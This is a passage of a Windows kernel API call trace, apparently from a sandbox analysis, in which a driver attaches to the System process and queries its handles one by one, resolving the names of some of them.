ObReferenceObjectByHandle (in: Handle=0xffffffff8000114c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.991] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.991] PsReleaseProcessExitSynchronization () returned 0x2 [0258.991] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f963 [0258.991] IoCompleteRequest () returned 0x0 [0258.991] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.991] PsAcquireProcessExitSynchronization () returned 0x0 [0258.991] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.991] ObReferenceObjectByHandle (in: Handle=0xffffffff80001150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.991] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.992] PsReleaseProcessExitSynchronization () returned 0x2 [0258.992] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f962 [0258.992] IoCompleteRequest () returned 0x0 [0258.992] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.992] PsAcquireProcessExitSynchronization () returned 0x0 [0258.992] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.992] ObReferenceObjectByHandle (in: Handle=0xffffffff8000115c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a6ab410, HandleInformation=0x0) returned 0x0 [0258.992] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.992] PsReleaseProcessExitSynchronization () returned 0x2 [0258.992] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f961 [0258.992] ObQueryNameString (in: Object=0xffffe0006a6ab410, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.992] ObfDereferenceObject (Object=0xffffe0006a6ab410) returned 0x8000 [0258.992] IoCompleteRequest () returned 0x0 [0258.992] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.992] PsAcquireProcessExitSynchronization () returned 0x0 [0258.992] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.992] ObReferenceObjectByHandle (in: Handle=0xffffffff80001160, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000695425f0, HandleInformation=0x0) returned 0x0 [0258.992] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.992] PsReleaseProcessExitSynchronization () returned 0x2 [0258.992] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f960 [0258.992] ObQueryNameString (in: Object=0xffffe000695425f0, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.992] ObfDereferenceObject (Object=0xffffe000695425f0) returned 0x8000 [0258.992] IoCompleteRequest () returned 0x0 [0258.992] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.992] PsAcquireProcessExitSynchronization () returned 0x0 [0258.992] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.992] ObReferenceObjectByHandle (in: Handle=0xffffffff80001164, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.992] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.992] PsReleaseProcessExitSynchronization () returned 0x2 [0258.992] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f95f [0258.992] IoCompleteRequest () returned 0x0 [0258.992] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.992] PsAcquireProcessExitSynchronization () returned 0x0 [0258.992] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.992] ObReferenceObjectByHandle (in: Handle=0xffffffff80001170, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.992] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.992] PsReleaseProcessExitSynchronization () returned 0x2 [0258.992] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f95e [0258.992] IoCompleteRequest () returned 0x0 [0258.992] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.992] PsAcquireProcessExitSynchronization () returned 0x0 [0258.992] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.992] ObReferenceObjectByHandle (in: Handle=0xffffffff80001174, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.992] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.992] PsReleaseProcessExitSynchronization () returned 0x2 [0258.992] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f95d [0258.993] IoCompleteRequest () returned 0x0 [0258.993] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.993] PsAcquireProcessExitSynchronization () returned 0x0 [0258.993] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.993] ObReferenceObjectByHandle (in: Handle=0xffffffff8000117c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.993] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.993] PsReleaseProcessExitSynchronization () returned 0x2 [0258.993] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f95c [0258.993] IoCompleteRequest () returned 0x0 [0258.993] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.993] PsAcquireProcessExitSynchronization () returned 0x0 [0258.993] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.993] ObReferenceObjectByHandle (in: Handle=0xffffffff80001184, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.993] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.993] PsReleaseProcessExitSynchronization () returned 0x2 [0258.993] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f95b [0258.993] IoCompleteRequest () returned 0x0 [0258.993] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.993] PsAcquireProcessExitSynchronization () returned 0x0 [0258.993] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.993] ObReferenceObjectByHandle (in: Handle=0xffffffff80001190, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.993] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.993] PsReleaseProcessExitSynchronization () returned 0x2 [0258.993] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f95a [0258.993] IoCompleteRequest () returned 0x0 [0258.993] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.993] PsAcquireProcessExitSynchronization () returned 0x0 [0258.993] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.993] ObReferenceObjectByHandle (in: Handle=0xffffffff80001194, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.993] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.993] PsReleaseProcessExitSynchronization () returned 0x2 [0258.993] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f959 [0258.993] IoCompleteRequest () returned 0x0 [0258.993] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.993] PsAcquireProcessExitSynchronization () returned 0x0 [0258.993] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.993] ObReferenceObjectByHandle (in: Handle=0xffffffff800011a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.993] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.993] PsReleaseProcessExitSynchronization () returned 0x2 [0258.993] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f958 [0258.993] IoCompleteRequest () returned 0x0 [0258.993] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.993] PsAcquireProcessExitSynchronization () returned 0x0 [0258.993] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.994] ObReferenceObjectByHandle (in: Handle=0xffffffff800011a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.994] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.994] PsReleaseProcessExitSynchronization () returned 0x2 [0258.994] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f957 [0258.994] IoCompleteRequest () returned 0x0 [0258.994] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.994] PsAcquireProcessExitSynchronization () returned 0x0 [0258.994] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.994] ObReferenceObjectByHandle (in: Handle=0xffffffff800011b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.994] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.994] PsReleaseProcessExitSynchronization () returned 0x2 [0258.994] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f956 [0258.994] IoCompleteRequest () returned 0x0 [0258.994] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.994] PsAcquireProcessExitSynchronization () returned 0x0 [0258.994] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.994] ObReferenceObjectByHandle (in: Handle=0xffffffff800011b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.994] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.994] PsReleaseProcessExitSynchronization () returned 0x2 [0258.994] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f955 [0258.994] IoCompleteRequest () returned 0x0 [0258.994] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.994] PsAcquireProcessExitSynchronization () returned 0x0 [0258.994] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.994] ObReferenceObjectByHandle (in: Handle=0xffffffff800011c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a369410, HandleInformation=0x0) returned 0x0 [0258.994] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.994] PsReleaseProcessExitSynchronization () returned 0x2 [0258.994] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f954 [0258.994] ObQueryNameString (in: Object=0xffffe0006a369410, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.994] ObfDereferenceObject (Object=0xffffe0006a369410) returned 0x8000 [0258.994] IoCompleteRequest () returned 0x0 [0258.994] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.994] PsAcquireProcessExitSynchronization () returned 0x0 [0258.994] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.994] ObReferenceObjectByHandle (in: Handle=0xffffffff800011c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.994] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.994] PsReleaseProcessExitSynchronization () returned 0x2 [0258.994] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f953 [0258.994] IoCompleteRequest () returned 0x0 [0258.994] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.994] PsAcquireProcessExitSynchronization () returned 0x0 [0258.994] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.994] ObReferenceObjectByHandle (in: Handle=0xffffffff800011d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.994] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.994] PsReleaseProcessExitSynchronization () returned 0x2 [0258.994] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f952 [0258.995] IoCompleteRequest () returned 0x0 [0258.995] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.995] PsAcquireProcessExitSynchronization () returned 0x0 [0258.995] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.995] ObReferenceObjectByHandle (in: Handle=0xffffffff800011e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.995] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.995] PsReleaseProcessExitSynchronization () returned 0x2 [0258.995] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f951 [0258.995] IoCompleteRequest () returned 0x0 [0258.995] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.995] PsAcquireProcessExitSynchronization () returned 0x0 [0258.995] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.995] ObReferenceObjectByHandle (in: Handle=0xffffffff800011f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.995] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.995] PsReleaseProcessExitSynchronization () returned 0x2 [0258.995] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f950 [0258.995] IoCompleteRequest () returned 0x0 [0258.995] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.995] PsAcquireProcessExitSynchronization () returned 0x0 [0258.995] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.995] ObReferenceObjectByHandle (in: Handle=0xffffffff80001210, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.995] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.995] PsReleaseProcessExitSynchronization () returned 0x2 [0258.995] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f94f [0258.995] IoCompleteRequest () returned 0x0 [0258.995] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.995] PsAcquireProcessExitSynchronization () returned 0x0 [0258.995] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.995] ObReferenceObjectByHandle (in: Handle=0xffffffff80001214, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.995] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.995] PsReleaseProcessExitSynchronization () returned 0x2 [0258.995] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f94e [0258.995] IoCompleteRequest () returned 0x0 [0258.995] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.995] PsAcquireProcessExitSynchronization () returned 0x0 [0258.995] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.995] ObReferenceObjectByHandle (in: Handle=0xffffffff8000121c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.995] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.995] PsReleaseProcessExitSynchronization () returned 0x2 [0258.995] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f94d [0258.995] IoCompleteRequest () returned 0x0 [0258.995] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.995] PsAcquireProcessExitSynchronization () returned 0x0 [0258.995] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.996] ObReferenceObjectByHandle (in: Handle=0xffffffff80001224, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.996] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.996] PsReleaseProcessExitSynchronization () returned 0x2 [0258.996] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f94c [0258.996] IoCompleteRequest () returned 0x0 [0258.996] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.996] PsAcquireProcessExitSynchronization () returned 0x0 [0258.996] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.996] ObReferenceObjectByHandle (in: Handle=0xffffffff80001228, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.996] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.996] PsReleaseProcessExitSynchronization () returned 0x2 [0258.996] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f94b [0258.996] IoCompleteRequest () returned 0x0 [0258.996] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.996] PsAcquireProcessExitSynchronization () returned 0x0 [0258.996] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.996] ObReferenceObjectByHandle (in: Handle=0xffffffff8000122c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.996] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.996] PsReleaseProcessExitSynchronization () returned 0x2 [0258.996] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f94a [0258.996] IoCompleteRequest () returned 0x0 [0258.996] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.996] PsAcquireProcessExitSynchronization () returned 0x0 [0258.996] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.996] ObReferenceObjectByHandle (in: Handle=0xffffffff80001234, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.996] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.996] PsReleaseProcessExitSynchronization () returned 0x2 [0258.996] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f949 [0258.996] IoCompleteRequest () returned 0x0 [0258.996] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.996] PsAcquireProcessExitSynchronization () returned 0x0 [0258.996] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.996] ObReferenceObjectByHandle (in: Handle=0xffffffff80001238, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.996] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.996] PsReleaseProcessExitSynchronization () returned 0x2 [0258.996] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f948 [0258.996] IoCompleteRequest () returned 0x0 [0258.997] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.997] PsAcquireProcessExitSynchronization () returned 0x0 [0258.997] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.997] ObReferenceObjectByHandle (in: Handle=0xffffffff8000123c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.997] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.997] PsReleaseProcessExitSynchronization () returned 0x2 [0258.997] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f947 [0258.997] IoCompleteRequest () returned 0x0 [0258.997] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.997] PsAcquireProcessExitSynchronization () returned 0x0 [0258.997] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.997] ObReferenceObjectByHandle (in: Handle=0xffffffff80001248, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.997] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.997] PsReleaseProcessExitSynchronization () returned 0x2 [0258.997] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f946 [0258.997] IoCompleteRequest () returned 0x0 [0258.997] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.997] PsAcquireProcessExitSynchronization () returned 0x0 [0258.997] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.997] ObReferenceObjectByHandle (in: Handle=0xffffffff8000124c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a565480, HandleInformation=0x0) returned 0x0 [0258.997] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.997] PsReleaseProcessExitSynchronization () returned 0x2 [0258.997] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f945 [0258.997] ObQueryNameString (in: Object=0xffffe0006a565480, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.997] ObfDereferenceObject (Object=0xffffe0006a565480) returned 0x8000 [0258.997] IoCompleteRequest () returned 0x0 [0258.997] PsLookupProcessByProcessId (in: ProcessId=0x4, 